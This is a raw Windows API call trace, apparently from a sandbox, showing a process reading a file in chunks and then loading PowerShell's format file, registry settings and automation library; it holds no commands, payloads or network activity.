	[0599.441] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.442] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.442] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.446] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.446] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.447] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.447] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.448] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.448] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.448] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.531] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.531] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.531] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.532] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.532] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.533] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.533] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.533] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.534] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.540] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.540] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.540] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.541] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.541] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.541] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.542] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.542] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.543] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.544] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.545] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.545] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.545] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.546] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.546] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.546] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.547] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.547] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.547] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.548] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.548] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.548] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.549] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.549] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.549] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.550] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.550] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.550] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.551] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.551] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.551] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0xf37, lpOverlapped=0x0) returned 1
	[0600.983] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6adef, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6adef*, lpNumberOfBytesRead=0xccdb8*=0x0, lpOverlapped=0x0) returned 1
	[0600.984] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x0, lpOverlapped=0x0) returned 1
	[0600.984] CloseHandle (hObject=0x2f0) returned 1
	[0600.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0600.984] SetErrorMode (uMode=0x1) returned 0x1
	[0600.984] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccd60 | out: lpFileInformation=0xccd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0600.984] SetErrorMode (uMode=0x1) returned 0x1
	[0600.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0600.985] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcce48 | out: phkResult=0xcce48*=0x2f0) returned 0x0
	[0600.985] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccdcc, lpData=0x0, lpcbData=0xccdc8*=0x0 | out: lpType=0xccdcc*=0x1, lpData=0x0, lpcbData=0xccdc8*=0x56) returned 0x0
	[0600.985] CoTaskMemAlloc (cb=0x5a) returned 0x1b3b7ea0
	[0600.985] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd9c, lpData=0x1b3b7ea0, lpcbData=0xccd98*=0x56 | out: lpType=0xccd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccd98*=0x56) returned 0x0
	[0600.985] CoTaskMemFree (pv=0x1b3b7ea0) 
	[0600.985] RegCloseKey (hKey=0x2f0) returned 0x0
	[0600.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0600.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0600.997] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x28868848, Data2=0x39b0, Data3=0x49ce, Data4=([0]=0xa0, [1]=0x47, [2]=0xa5, [3]=0xd6, [4]=0x6a, [5]=0x33, [6]=0x97, [7]=0x28))) returned 0x0
	[0600.998] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xdded3ab0, Data2=0xb8a9, Data3=0x4561, Data4=([0]=0xa9, [1]=0xf, [2]=0x6a, [3]=0xc0, [4]=0xee, [5]=0x5f, [6]=0x63, [7]=0xd7))) returned 0x0
	[0600.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0600.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0600.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0600.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.708] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x54bfdb24, Data2=0x1906, Data3=0x43aa, Data4=([0]=0x80, [1]=0x32, [2]=0xd, [3]=0xfe, [4]=0xba, [5]=0x22, [6]=0x99, [7]=0x16))) returned 0x0
	[0603.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
